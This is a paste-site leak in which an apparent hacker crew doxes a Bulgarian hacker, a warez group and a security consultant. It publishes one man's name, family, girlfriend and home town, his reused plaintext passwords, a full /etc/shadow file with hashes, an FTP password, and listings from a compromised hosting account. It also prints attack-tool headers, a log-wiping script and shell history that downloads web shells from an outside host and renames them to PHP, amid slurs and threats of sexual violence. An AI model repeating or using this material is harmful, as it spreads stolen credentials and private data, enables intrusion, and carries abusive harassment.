Paste2.org - Viewing Paste Ie6gDsZF

__________ __ _____ __________.__
\______ \__ _ _______/ |_ / | | \______ \ |__ __ __ ____
| ___/\ \/ \/ / \ __\ / | |_ | ___/ | \| | \/ \
| | \ / | \ | / ^ / | | | Y \ | / | \
|____| \/\_/|___| /__| \____ | |____| |___| /____/|___| /
\/ |__| \/ \/
LOL > SlaserX < LOL
LOL > Pirate-Sky < LOL
LOL > SecurityGuy < LOL
* LOL * SlaserX * LOL *
SlaserX is a well-known criminal and wannabe hacker from Bulgaria. He's been around for quite some time now. A few weeks ago the miserable idiot and his fellow minions got finally busted and the misguided cops mistakenly claimed to have arrested the most powerful hacker group in Bulgaria[1]. Wait, what?!
Cops, Y U so unbelievably stupid? You're nothing but miserable media whores. We've been fucking around with these kids and we certainly know how 1337 they are. We've got their passwords, we've been reading through their mail spools, we've been laughing at their hacking attempts and yet, you call them the most powerful hacker group. Yes, some of the most talented hackers worldwide are actually based in Eastern Europe, but you silly bitches won't ever hear about them. Suck on my hard cock and and die, brainless cunts! How the fuck can you even be so stupid and lame?
Take a seat, enjoy this leak and remember.. this is absolutely nothing compared to what we've done to you, idiots.
[1] http://press.mvr.bg/en/News/news120704_08.htm
>> So, who's this guy?
First Name: Ivan
Last Name: Bachvarov
Nickname: SlaSerX
Birthday: 21.07.1986
Height: 1.76cm
Father: Jecho Bachvarov
Sister: Mariana Bachvarova
Girlfriend: Mihaela Mandalcheva
Location: Burgas, Bulgaria
>> Let's take a look at what his passwords look like.
vbox7.com (slaserx:1986125),
hit.bg (slaserx:1986125),
theunkn0wn.org (slaserx:1986125),
kaldata.com (slaserx:1986125),
bghelp.bg (slaserx:1986125),
etc.
>> Yes, password reusage is so typical for these idiots. You still call yourself a hacker? Here are some of his already owned mail boxes.
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
>> Guess how 1337 his passwords were? ;) Now let's take a look at some of his boxes.
root@bgdns:/root# uname -a
Linux bgdns 2.6.32-5-686 #1 SMP Wed Jan 12 04:01:41 UTC 2011 i686 GNU/Linux
root@bgdns:/root# w
23:15:45 up 6:26, 2 users, load average: 0.08, 0.09, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 office 16:51 6:23m 0.42s 0.42s -bash
root pts/1 office 17:37 5:17m 0.34s 0.34s -bash
root@bgdns:/root# cat /etc/shadow
root:$6$OeWqv5cY$zN9ZVm79q0KLjbsWI.HG0MMlUPiv6c2PrOtYwHJt1UFtcgXwhIgY63u0ZQuMXnWlUN4rKCDbf9Qb7jwC.Bdpp.:15024:0:99999:7:::
daemon:*:15024:0:99999:7:::
bin:*:15024:0:99999:7:::
sys:*:15024:0:99999:7:::
sync:*:15024:0:99999:7:::
games:*:15024:0:99999:7:::
man:*:15024:0:99999:7:::
lp:*:15024:0:99999:7:::
mail:*:15024:0:99999:7:::
news:*:15024:0:99999:7:::
uucp:*:15024:0:99999:7:::
proxy:*:15024:0:99999:7:::
www-data:*:15024:0:99999:7:::
backup:*:15024:0:99999:7:::
list:*:15024:0:99999:7:::
irc:*:15024:0:99999:7:::
gnats:*:15024:0:99999:7:::
nobody:*:15024:0:99999:7:::
libuuid:!:15024:0:99999:7:::
Debian-exim:!:15024:0:99999:7:::
statd:*:15024:0:99999:7:::
sshd:*:15024:0:99999:7:::
slaserx:$6$XW1z1pT4$h/y7KaZRtOjijhnQLV4nIeBwMggaX/WwPTCVEUasRnUwKMIs1NVA70/4EwE/wDQTsH/xgzYQeEgtaiP3NtEkx1:15031:0:99999:7:::
postfix:*:15024:0:99999:7:::
mysql:!:15024:0:99999:7:::
bind:*:15024:0:99999:7:::
polw:!:15024:0:99999:7:::
postgrey:*:15024:0:99999:7:::
proftpd:!:15024:0:99999:7:::
ftp:*:15024:0:99999:7:::
vmail:!:15024:0:99999:7:::
vu2000:!:15024:0:99999:7:::
vu2001:!:15024:0:99999:7:::
vu2002:!:15024:0:99999:7:::
vu2003:!:15024:0:99999:7:::
snmp:*:15025:0:99999:7:::
vu2004:!:15025:0:99999:7:::
vu2005:!:15031:0:99999:7:::
vu2006:!:15034:0:99999:7:::
vu2007:!:15034:0:99999:7:::
vu2008:!:15035:0:99999:7:::
messagebus:*:15038:0:99999:7:::
lbcd:*:15038:0:99999:7:::
vu2009:!:15039:0:99999:7:::
>> Ever wondered what the most powerful hacker tools look like? Well, take look..
root@bgdns:/root# head -25 l33t/a.pl
#!/usr/bin/perl
use IO::Socket;
print q{
#######################################################################
# vBulletin. Version 4.0.1 Remote SQL Injection Exploit #
# By indoushka #
# www.iq-ty.com/vb #
# Souk Naamane (00213771818860) #
# Algeria Hackerz ([email protected]) #
# Dork: Powered by vBulletin. Version 4.0.1 #
#######################################################################
};
if (!$ARGV[2]) {
print q{
Usage: perl VB4.0.1.pl host /directory/ victim_userid
perl VB4.0.1.pl www.vb.com /forum/ 1
};
root@bgdns:/root# head -5 l33t/gen
#!/usr/bin/perl
##
### bren.pl . Generate every character combination for 15 characters in length(ughh.)
##
#
root@bgdns:/root# head -30 l33t/t.pl
#!/usr/bin/perl
use IO::Socket;
use LWP::Simple;
use MIME::Base64;
$host = $ARGV[0];
$user = $ARGV[1];
$port = $ARGV[2];
$list = $ARGV[3];
$file = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
###############################################################
# Cpanel Password Brute Force Tool #
###############################################################
# usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
#-------------------------------------------------------------#
# [Host] : victim Host (simorgh-ev.com) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#[list] : File Of password list (list.txt) #
# [File] : file for save password (password.txt) #
# #
###############################################################
# (c)oded By Hessam-x / simorgh-ev.com #
###############################################################
);exit;}
root@bgdns:/root# tar tvf tools.tar
drwxr-xr-x root/root 0 2011-02-11 11:14 tools/
-rwxr-xr-x root/root 904 2011-01-15 18:18 tools/stop.flood
-rwxr-xr-x root/root 700 2011-01-15 18:21 tools/monitor
-rw-r--r-- slaserx/slaserx 1800 2011-02-11 11:11 tools/shells.zip
-rwxr-xr-x root/root 1853 2011-02-07 18:30 tools/check.ssh
drwxr-xr-x root/root 0 2011-01-16 19:45 tools/sms/
-rwxr-xr-x root/root 1360 2011-01-16 19:26 tools/sms/212.70.159.86
-rwxr-xr-x root/root 1332 2011-01-16 19:41 tools/sms/212.70.159.82-m
-rwxr-xr-x root/root 1326 2011-01-16 19:42 tools/sms/212.70.159.86-m
-rwxr-xr-x root/root 1271 2011-01-16 19:30 tools/sms/7.7.7.7
-rwxr-xr-x root/root 1331 2011-01-16 19:43 tools/sms/212.70.159.87-m
-rwxr-xr-x root/root 630 2011-01-19 09:47 tools/sms/run
-rwxr-xr-x root/root 1333 2011-01-16 19:42 tools/sms/212.70.159.83-m
-rwxr-xr-x root/root 1365 2011-01-16 19:27 tools/sms/212.70.159.87
-rwxr-xr-x root/root 1367 2011-01-16 18:50 tools/sms/212.70.159.83
-rwxr-xr-x root/root 1366 2011-01-16 18:49 tools/sms/212.70.159.82
-rwxr-xr-x root/root 1332 2011-01-16 19:40 tools/sms/94.156.142.99-m
-rwxr-xr-x root/root 1366 2011-01-16 18:45 tools/sms/94.156.142.99
-rwxr-xr-x root/root 528 2011-01-15 18:20 tools/unban
-rwxr-xr-x root/root 526 2011-01-15 18:19 tools/ban
-rwxr-xr-x root/root 136 2011-01-15 18:36 tools/grep.404
-rwxr-xr-x root/root 468 2011-01-15 18:35 tools/logged
-rwxr-xr-x root/root 302 2011-01-15 18:22 tools/dellog
-rw-r--r-- root/root 14 2011-02-07 18:30 tools/bannedips.txt
drwxr-xr-x root/root 0 2011-02-11 14:38 tools/shells/
-rwxr-xr-x root/root 143 2010-07-16 13:41 tools/shells/find.r57
-rwxr-xr-x root/root 12 2010-07-16 13:45 tools/shells/a
-rwxr-xr-x root/root 144 2010-07-16 13:56 tools/shells/find.eval
-rwxr-xr-x root/root 178 2010-07-16 14:35 tools/shells/find.shell
-rwxr-xr-x root/root 144 2010-07-16 13:45 tools/shells/find.rt13
-rwxr-xr-x root/root 153 2010-07-16 13:49 tools/shells/find.decode
-rwxr-xr-x root/root 34461 2011-02-11 14:40 tools/shells/scan.txt
-rwxr-xr-x root/root 143 2010-06-30 14:57 tools/shells/find.c99
drwxr-xr-x root/root 0 2011-02-04 20:46 tools/backup/
-rwxr-xr-x root/root 641 2011-02-04 20:44 tools/backup/backup-rsbg
-rwxr-xr-x root/root 657 2011-02-04 20:45 tools/backup/backup-slaserx
-rwxr-xr-x root/root 271 2011-02-07 11:23 tools/backup/run
-rwxr-xr-x root/root 650 2011-02-04 20:41 tools/backup/backup-psc
root@bgdns:/root# tar tzvf t.tar.gz
drwxr-xr-x root/root 0 2011-03-01 20:20 l33t/
-rwxr-xr-x root/root 2358 2011-02-28 17:26 l33t/a.pl
-rwxr-xr-x root/root 961923 2011-02-27 01:31 l33t/list.txt
-rwxr-xr-x root/root 18883 2010-12-20 01:09 l33t/slowloris.pl
-rwxr-xr-x root/root 156 2011-03-01 18:17 l33t/test.txt
-rwxrwxrwx root/root 11 2011-02-28 17:26 l33t/a
-rwx--x--x root/root 66502 2011-02-27 06:46 l33t/list.txt.save
-rw-r--r-- root/root 20056 2011-03-01 20:21 l33t/ssh2ftpcrack.tar.bz2
-rwxr-xr-x root/root 2109 2011-02-27 00:51 l33t/t.pl
-rwxr-xr-x root/root 6359 2011-02-27 00:52 l33t/gen
root@bgdns:/root# cat .bash_alias
# some more ls aliases
alias less='less -SR'
alias l='ls -lLBhX --time-style=locale'
alias la='ls -la $1 | less'
alias ll='ls -lX'
alias lx='ls -lXB' #sort by ext
alias lk='ls -lSr' #soft by size
# Alias's to modifed commands
alias ps='ps auxf'
alias home='cd ~'
alias pg='ps aux | grep' #requires an argument
alias lg='ls -la | grep' #requires an argument
alias un='tar -zxvf'
alias df='df -hT'
alias ping='ping -c 10'
#alias net-restart='sudo /etc/init.d/networking restart'
#alias windir="cd '/home/hkvn/.wine/drive_c/Program Files'"
alias ..='cd ..'
alias update='sudo apt-get update'
alias upgrade='sudo apt-get upgrade'
alias install='sudo apt-get install'
alias remove='sudo apt-get remove'
#alias eclipse='eclipse -vmargs -Xmx512M'
#alias firefox='firefox-3.5'
alias ipconfig='ifconfig -a'
#My alias
alias flood='netstat'
alias stop='/root/tools/stop.flood'
alias ban='/root/tools/ban.pl'
alias unban='/root/tools/unban.pl'
alias monitor='/root/tools/monitor.sh'
alias cron='env EDITOR=nano crontab -e'
alias editcfg='pico /var/www/ispcp/gui/index.php'
alias arest='/etc/init.d/apache2 restart'
alias cls='clear'
alias q='exit'
# Some ssh connections
alias shell='ssh -l slaserx slaserx.ath.cx'
#alias xalo='sudo vpnc-connect xalo.conf'
# Some ping commands
#alias pga='ping 192.168.1.1 -c 10'
#alias pgo='ping google.com -c 10'
#alias phk='ping hkvn.info -c 10'
#alias pch='ping chuyenhungyen.org -c 10'
#Some chmod commands
alias mx='chmod a+x'
alias 000='chmod 000'
alias 644='chmod 644'
alias 755='chmod 755'
# cat .bash_history
clear
nmap localhost
exit
host perfektno.com
w
iptables -L |grep 77.78.36.40
ban 77.78.36.40
pico /etc/init.d/firewall
ls -a
iptables -L
clear
search metaspolit
search metasploit
search icmp rate
pico /etc/init.d/firewall
iptables -L
stop
flood
clear
exit
pico /etc/networks
pico /etc/network/interfaces
exit
host cs-adrenalines.info
host 79.124.67.194
stop
flood
cat /var/log/fail2ban.log
cat /var/log/psad/fw_check
cat /var/log/psad/top_attackers
clear
clear
stop
exit
cd l33t/
wget https://cirt.net/nikto/nikto-2.1.4.tar.bz2
ls -a
wget
wget --help
wget --help |grep ssl
wget --no-check-certificate https://cirt.net/nikto/nikto-2.1.4.tar.bz2
tar -jxvf nikto-2.1.4.tar.bz2
cd nikto-2.1.4/
ls -a
./nikto.pl
./nikto.pl -host abv.bg -root
./nikto.pl -host abv.bg -root+
./nikto.pl -host abv.bg
./nikto.pl
./nikto.pl -host
./nikto.pl -host pweb.co.cc
w
last
flood
stop
apachectl restart
stop
apachectl restart
cd /root/tools/
./dellog
cat /var/log/apache2/pirate-sky.info-combined.log
cat /var/log/apache2/pirate-sky.info-combined.log
cat /var/log/apache2/pirate-sky.info-combined.log
iptables -L
host eco.gov.kz
cat /var/log/apache2/pirate-sky.info-combined.log
apachectl restart
apachectl restart
ls -a
cron
cron
/etc/init.d/cron restart
cd /var/www/virtual/warez-database.org/htdocs/
ls -a
cd hooks/
ls -a
cd ..
ls -a
cd converge_local/
ls -a
ls -a
ls -a
wget xpls.hit.bg/shell/shell.gif
rm -rf shell.gif
wget xpls.hit.bg/shell/linuxbg.shell
wget xpls.hit.bg/shell/linuxbg.gif
rm -rf linuxbg.*
ls -a
ls -a
mv /home/slaserx/faq.php ./
ls -a
rm -rf .htaccess
ls -a
rm -rf faq.php
/
cd /
pico /var/www/virtual/linuxbg.info/htdocs/pr00f/index.php
pico /var/www/virtual/linuxbg.info/htdocs/pr00f/index.php
clear
whois privatecrew.net
whois privatecrew.net
whois bgdns.info
host freebsd.bg
clear
genpasswd
clear
genpasswd
genpasswd
genpasswd
ls -a
cd /var/www/virtual/privatecrew.net/htdocs/
ls -s
ls -a
rm -rf *
ls -a
ls -a
cd ..
cp ../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2 ./
ls -a
cat ../pirate-sky.info/htdocs/conf_global.php
ls -a
cp pirate-sky.info-backup-2011.03.06-000737.tar.bz2 backups/
clear
ls -a
rm -rf pirate-sky.info-backup-2011.03.06-000737.tar.bz2
rm -rf backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2
genpasswd
genpasswd
genpasswd
ls -a
cd htdocs/
ls -a
pico /etc/init.d/firewall
cat /etc/init.d/firewall
iptables -t filter -A INPUT -s 95.42.32.36 -j ACCEPT
pico /etc/init.d/firewall
/etc/init.d/firewall
flood
stop
ls -a
iptables -L |grep 94.156.142.66
iptables -L |grep lucifer
stop
iptables -L |grep 95.42.32.36
iptables -L
cd /var/www/fcgi/
ls -a
pico warez-database.org/php5/php.ini
pico privatecrew.net/php5/php.ini
pico privatecrew.net/php5/php.ini
apachectl restart
pico privatecrew.net/php5/php.ini
apachectl restart
ls -a
pico pirate-sky.com/php5/php.ini
pico privatecrew.net/php5/php.ini
apachectl restart
cd /root/tools/
ls -a
cd shells/
pico new.p
pico new
ls -a
./a
ls -a
pico find.r57
pico new
./find.
./new
ls -a
ls -a
cd /var/www/virtual/
ls -a
cd privatecrew.net/htdocs/
cd /root/tools/
cd shells/
./new
ls -a
pico new
pico find.eval
ls -a
pico new
pico new
./new
ls -a
pico new
ls -a
./new
ls -a
pico new
ls -a
./new
pico new
./new
ls -a
rm -rf new
pico find.shell
cat scan.txt
pico scan.txt
rm -rf scan.txt
ls -a
./find.shell
ls -a
cat scan.txt
ls -a
rm -rf scan.txt
cat sc
ls -a
pico find.shell
pico find.shell
./find.shell
cat scan.txt
rm -rf scan.txt
ls -a
./find.shell
cat scan.txt
cat scan.txt |grep faq.php
ls -a
rm -rf scan.txt
pico /var/www/virtual/privatecrew.net/htdocs/faq.php
pico find.shell
ls -a
./find.
./find.shell
cat scan.txt
ls -a
clear
cd /var/www/virtual/
ls -a
cd privatecrew.net/
ls -a
cd htdocs/
cd 0893552070/
ls -a
wget http://xpls.hit.bg/shell/c99.gif
wget http://xpls.hit.bg/shell/devil.gif
wget http://xpls.hit.bg/shell/linux.gif
ls -a
mv linux.gif linux.php
ls -a
mv devil.gif devil.php
mv c99.gif c99.php
ls -a
wget http://xpls.hit.bg/shell/shell.gif
mv shell.gif shell.php
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
cp linux.php /var/www/virtual/linuxbg.info/htdocs/pr00f/forum/ranks/
rm -rf /var/www/virtual/linuxbg.info/htdocs/pr00f/forum/ranks/linux.php
ls -a
ls -a
ls -a
clear
ls -a
cd ..
rm -rf 0893552070/
ls -a
exit
ls -a
ls -a
cd /var/www/virtual/pirate-sky.
cd /var/www/virtual/privatecrew.net/htdocs/
ls -a
cd a
ls -a
cd asd/
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
rm crontab -l
crontab -l
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
cd ..
ls -a
ls -a
rm -rf admin/
rm -rf cache/
rm -rf con*
ls -a
rm -rf includes/
ls -a
ls -a
rm -rf interface/
rm -rf ips_kernel/
ls -a
rm -rf public/
rm -rf starforum/
ls -a
rm -rf uploads/
ls -a
ls -a
ls -a
cd ..
cd htdocs/
cd ..
cd backups/
ls -a
cp ../../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2
cp ../../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2 ./
ls -a
pico /etc/crontab
ls -a
cd ..
ls -a
cd htdocs/
ls -a
cd ..
cd backups/
rm -rf pirate-sky.info-backup-2011.03.06-000737.tar.bz2
cd ..
cd htdocs/
cd pp/
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
host mikrotik-bg.net
host 195.191.149.89
cat /var/log/cron.log
ls -a
crontab -l
cron
/etc/init.d/cron restart
/etc/init.d/cron status
ls -a
ls -a
cat /var/log/cron.log
cat /var/log/cron.log |grep err
clear
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
cat /var/log/cron.log
ls -a
ls -a
crontab -l
ls -a
ls -a
cat /var/log/cron.log
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls
ls
ls -a
ls -a
ls -a
ls -a
ls -a
ls -la
ls -a
ls -a
ls -a
ls -a
ls -a
cat /var/log/cron.log
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
wget xpls.hit.bg/shell.gif
wget xpls.hit.bg/linux.gif
mv linux.gif linux.php
mv shell.gif shell.php
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
rm -rf /tmp/scan.txt
ls -a
ls -a
ls -la
ls -a
ls -a
ls -a
pico linux.php
ls -a
rm -rf linux.php
rm -rf shell.php
ls -a
ls -a
wget xpls.hit.bg/shell/shell.gif
wget xpls.hit.bg/shell/linux.gif
mv linux.gif linux.php
mv shell.gif shell.php
pico shell.php
ls -a
pico shell.php
ls -a
wget xpls.hit.bg/shell/shell.gif
mv linux.gif linux.php
wget xpls.hit.bg/shell/linux.gif
ls -a
mv linux.gif linux.php
mv shell.gif shell.php
ls -a
ls -a
ls -a
ls -a
ls -a
cat /tmp/scan.txt
ls -a
ls -a
ls -a
ls -a
cat /var/log/cron.log
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
cd ..
cd ..
cd ..
cd ..
exit
cd /var/www/virtual/
ls -a
cd linuxbg.info/
cd backups/
ls -a
rm -rf t3es_vb.sql.bz2
ls -a
rm -rf t3es_soze.sql.bz2
ls -a
whois cms-bg.com
whois jump.bg
stop
cat /tmp/scan.txt
cat /var/log/apache2/other_vhosts_access.log
cat /var/log/apache2/default-error.log
clear
cat /var/log/apache2/default-error.log
clear
cat /var/log/apache2/default-error.log
cat /var/log/apache2/default-error.log
cat /var/log/apache2/default-error.log
clear
clear
clear
exit
os -a
pico /etc/init.d/firewall
ping abv.bg
ls -a
exit
root@bgdns:/root/tools/backup# cat backup-psc
#!/bin/sh
#Created by SlaSerX
#red='1;31m'
TARGET_EMAIL="[email protected]"
# local directory to pickup *.tar.gz file
tar zcvf /backup/psc/pirate-sky.$(date +%s).$(date +"%d-%m-%Y").tgz /var/www/virtual/pirate-sky.com/backups/
# ftp remote connections
FTPU="backup" # ftp login name
FTPP="1986125" # ftp password
FTPS="85.217.204.199" # remote ftp server
FTPF="/home/backup/psc/" # remote ftp server directory for $FTPU & $FTPP
LOCALD="/backup/psc/*.tgz"
ncftpput -m -u $FTPU -p $FTPP $FTPS $FTPF $LOCALD
echo
echo -e " \e[${red} Upload psc Backup \e[m"
echo 'pirate-sky' | mail -s "Backup Uploaded:" $TARGET_EMAIL
echo
root@bgdns:/root/tools# head -10 check.ssh
#!/usr/bin/perl
##############################################################################
# By BumbleBeeWare.com 2006
# SSH Log Checker
# sshlogcheck.cgi
# reads ssh log and blocks hacking attempts using ip tables
##############################################################################
# CONFIGURE
##############################################################################
root@bgdns:/root/tools# cat dellog
#!/bin/bash
#Created by SlaSerX
red='1;31m'
/bin/rm -rf /var/log/apache2/*.log
/bin/rm -rf /var/log/apache2/*.log.*
/bin/rm -rf /var/log/apache2/users/*.log
/bin/rm -rf /var/log/apache2/users/*.log.*
/etc/init.d/apache2 restart
echo -e " \e[${red} Apache logs Erase. Apache has been restarted\e[m"
root@bgdns:/root/tools# cat grep.404
grep "404" /var/log/apache2/users/pirate-sky.com-access.log | grep "`date +%d/%b/%Y`" | mailx -s 'SUBJECT GOES HERE' '[email protected]'
>> Refer to the URL at the end of the file for some more fun.
* LOL * Pirate-Sky * LOL *
Lamez.org, Pirate-Sky, World Warez Crew, CyberWarrior Invasion Group, etc. are all the same bitches and idiots again and again. They've been continuously renaming their own groups due to all kind of spectacular fails during the years. These are basically brainless infants playing with SQLmap and defacing outdated and improperly configured CMSs.
You can clearly see how randomly they choose their targets -
http://www.zone-h.org/archive/notifier=Cyber%20Warrior%20Invasion
>> Check the aforementioned URL for their databases. ;)
* LOL * SecurityGuy * LOL *
Alexander Sverdlov a.k.a. the SecurityGuy is one of those pseudo-security whores that you'd like to publicly rape. This information security illiterate has been making money through consultancy and training services for ages. Giving your money to this miserable monkey will eventually boost your false sense of security, but nothing more or less. Beware of who you're entrusting your security decisions. Really.
>> Let's just briefly review what's this bitch up to.
[email protected] [/home/nopasara/public_html/securityguy]# uname -a
Linux hera.superhosting.bg 2.6.18-194.32.1.el5 #1 SMP Wed Jan 5 17:52:25 EST 2011 x86_64 x86_64 x86_64 GNU/Linux
[email protected] [/home/nopasara/public_html/securityguy]# id
uid=32684(nopasara) gid=32686(nopasara) groups=32686(nopasara)
[email protected] [/home/nopasara]# ls -lia
total 28108
35897345 drwx--x--x 18 nopasara nopasara 4096 Mar 12 14:04 ./
2 drwx--x--x 660 root root 20480 Mar 19 16:50 ../
35897557 -rw------- 1 nopasara nopasara 3048 Jan 18 2010 .bash_history
35897347 -rw-r--r-- 1 nopasara nopasara 33 Dec 10 2008 .bash_logout
35897346 -rw-r--r-- 1 nopasara nopasara 176 Dec 10 2008 .bash_profile
35897348 -rw-r--r-- 1 nopasara nopasara 124 Dec 10 2008 .bashrc
35897357 -rw------- 1 nopasara nopasara 17 Dec 10 2008 .contactemail
35897376 drwx------ 5 nopasara nopasara 4096 Mar 4 11:07 .cpanel/
35897878 -rw------- 1 nopasara nopasara 15 Dec 31 2008 .cpanel-logs
35897520 -rw-r--r-- 1 nopasara nopasara 6 Mar 20 02:45 .dns
35897450 drwxr-x--- 7 nopasara nopasara 4096 Feb 25 2010 .fantasticodata/
35897436 -rw------- 1 nopasara nopasara 17 Feb 18 01:53 .ftpquota
35897353 drwxr-x--- 3 nopasara nobody 4096 Jan 4 2009 .htpasswds/
35897354 -rw------- 1 nopasara nopasara 12 Mar 4 10:44 .lastlogin
35897419 drwx------ 2 nopasara nopasara 4096 Dec 19 2008 .trash/
35898508 -rw------- 1 nopasara nopasara 1808 Jan 18 2010 .viminfo
35897374 lrwxrwxrwx 1 nopasara nopasara 34 Dec 10 2008 access-logs -> /usr/local/apache/domlogs/nopasara/
35946500 drwxr-xr-x 2 nopasara nopasara 4096 Nov 25 15:44 backups/
35897650 -rw-r----- 1 nopasara nopasara 1 Dec 27 2008 cpbackup-exclude.conf
36209930 drwxr-xr-x 3 nopasara nopasara 4096 Jul 26 2009 default/
35897906 drwxr-xr-x 2 nopasara nopasara 4096 Apr 12 2009 docs/
35897349 drwxr-x--- 3 nopasara mail 4096 Feb 6 16:07 etc/
36044801 drwx------ 2 nopasara nopasara 12288 Feb 28 15:20 logs/
35897351 drwxrwx--- 7 nopasara nopasara 4096 Apr 21 2010 mail/
35963400 drwxr-xr-x 2 nopasara nopasara 4096 Jan 16 2010 mysql/
35898497 -rw-r--r-- 1 nopasara nopasara 4128921 Jan 10 2010 nopasara_blog.sql
35897470 -rw-r--r-- 1 nopasara nopasara 723362 Feb 13 18:25 nopasara_emea.sql
35897856 -rw-r--r-- 1 nopasara nopasara 38813 Feb 15 13:28 php.ini
35932502 drwxr-xr-x 3 nopasara nopasara 4096 Jan 27 2010 procedures/
35897355 drwxr-xr-x 3 nopasara nopasara 4096 Nov 6 2005 public_ftp/
35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 public_html/
35898505 -rw-r--r-- 1 nopasara nopasara 23699498 Jan 18 2010 sverdlov.sql
35913892 drwxr-xr-x 2 nopasara nopasara 4096 May 20 2009 test/
35897350 drwxr-xr-x 7 nopasara nopasara 4096 Mar 4 11:07 tmp/
35897358 lrwxrwxrwx 1 nopasara nopasara 11 Dec 10 2008 www -> public_html/
[email protected] [/home/nopasara/public_html]# ls -lia
total 2286196
35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 ./
35897345 drwx--x--x 18 nopasara nopasara 4096 Mar 12 14:04 ../
35897364 -rw-r--r-- 1 nopasara nopasara 0 Feb 13 23:17 .htaccess
35967226 drwxr-xr-x 2 nopasara nopasara 4096 Jul 5 2009 _notes/
35897444 drwxr-xr-x 6 nopasara nopasara 4096 Jan 16 15:28 bgsecrets.com/
35947140 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 blog/
35947141 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 cdn/
37601282 drwxr-xr-x 2 nopasara nopasara 4096 Oct 4 18:47 cgi-bin/
35947142 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 cmdb/
35947139 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 crm/
36129979 drwxr-xr-x 10 nopasara nopasara 4096 Jan 12 2010 demo/
35930169 drwxr-xr-x 5 nopasara nopasara 4096 Mar 17 12:35 emeastudio/
35947143 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 eye/
35897426 -rw-r--r-- 1 nopasara nopasara 0 Feb 13 23:17 index.php
35980080 drwxr-xr-x 6 nopasara nopasara 4096 Jan 28 12:07 ioscompatible.com/
35897530 -rw-r--r-- 1 nopasara nopasara 2338684928 Feb 28 01:23 nfs.iso
37751973 drwxr-xr-x 3 nopasara nopasara 4096 Jan 6 21:24 png/
36094784 drwxr-xr-x 8 nopasara nopasara 4096 Mar 20 02:37 securityguy/
35948620 drwxr-xr-x 5 nopasara nopasara 4096 Mar 5 01:53 studioburgas/
36241410 drwxr-xr-x 8 nopasara nopasara 4096 Feb 6 15:19 sverdlov.net/
35964452 drwxr-xr-x 2 nopasara nopasara 4096 Jan 30 23:07 test/
35930404 drwxr-xr-x 5 nopasara nopasara 4096 Dec 29 21:25 topusahostingproviders.com/
35914083 drwxr-xr-x 3 nopasara nopasara 4096 Jan 7 01:53 tragedyworld.com/
35897467 drwxr-xr-x 6 nopasara nopasara 4096 Jan 6 21:25 web/
36144507 drwxr-xr-x 11 nopasara nopasara 4096 Jul 5 2010 wo/
[email protected] [/home/nopasara/public_html/securityguy]# ls -lia
total 5722468
36094784 drwxr-xr-x 8 nopasara nopasara 4096 Mar 20 02:37 ./
35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 ../
36094811 -rw------- 1 nopasara nopasara 16 Mar 7 01:54 .ftpquota
36094012 -rw-r--r-- 1 nopasara nopasara 3987 Mar 2 01:23 .htaccess
37093607 drwxr-xr-x 2 nopasara nopasara 4096 Jan 26 2010 cgi-bin/
36094022 -rw-r--r-- 1 nopasara nopasara 1468465152 Nov 21 2009 dni.avi
36094931 -rw-r--r-- 1 nopasara nopasara 397 Mar 2 01:21 index.php
37322753 drwxr-xr-x 7 nopasara nopasara 4096 Nov 9 2009 leech/
36094114 -rw-r--r-- 1 nopasara nopasara 15606 Mar 2 01:21 license.txt
36094164 -rw-r--r-- 1 nopasara nopasara 210 Jan 7 02:58 php.ini
36094115 -rw-r--r-- 1 nopasara nopasara 9200 Mar 2 01:21 readme.html
36094934 -rw-r--r-- 1 nopasara nopasara 27 Sep 27 2009 robots.txt
36094031 -rw-r--r-- 1 nopasara nopasara 388 Dec 1 2009 start.png
36978690 drwxr-xr-x 3 nopasara nopasara 4096 Dec 1 2009 task/
36094935 -rw-r--r-- 1 nopasara nopasara 5612818 Sep 27 2009 webtech_2009.tar.gz
36094061 -rw-r--r-- 1 nopasara nopasara 4337 Mar 2 01:21 wp-activate.php
36094786 drwxr-xr-x 9 nopasara nopasara 4096 Mar 2 01:21 wp-admin/
36095227 -rw-r--r-- 1 nopasara nopasara 40283 Mar 2 01:21 wp-app.php
36095228 -rw-r--r-- 1 nopasara nopasara 226 Mar 2 01:21 wp-atom.php
36095229 -rw-r--r-- 1 nopasara nopasara 274 Mar 2 01:21 wp-blog-header.php
36095230 -rw-r--r-- 1 nopasara nopasara 3931 Mar 2 01:21 wp-comments-post.php
36095231 -rw-r--r-- 1 nopasara nopasara 244 Mar 2 01:21 wp-commentsrss2.php
36095232 -rw-r--r-- 1 nopasara nopasara 3177 Mar 2 01:21 wp-config-sample.php
36095233 -rw-r--r-- 1 nopasara nopasara 1742 Mar 2 01:21 wp-config.php
36094792 drwxr-xr-x 7 nopasara nopasara 4096 Mar 2 01:25 wp-content/
36095718 -rw-r--r-- 1 nopasara nopasara 1255 Mar 2 01:21 wp-cron.php
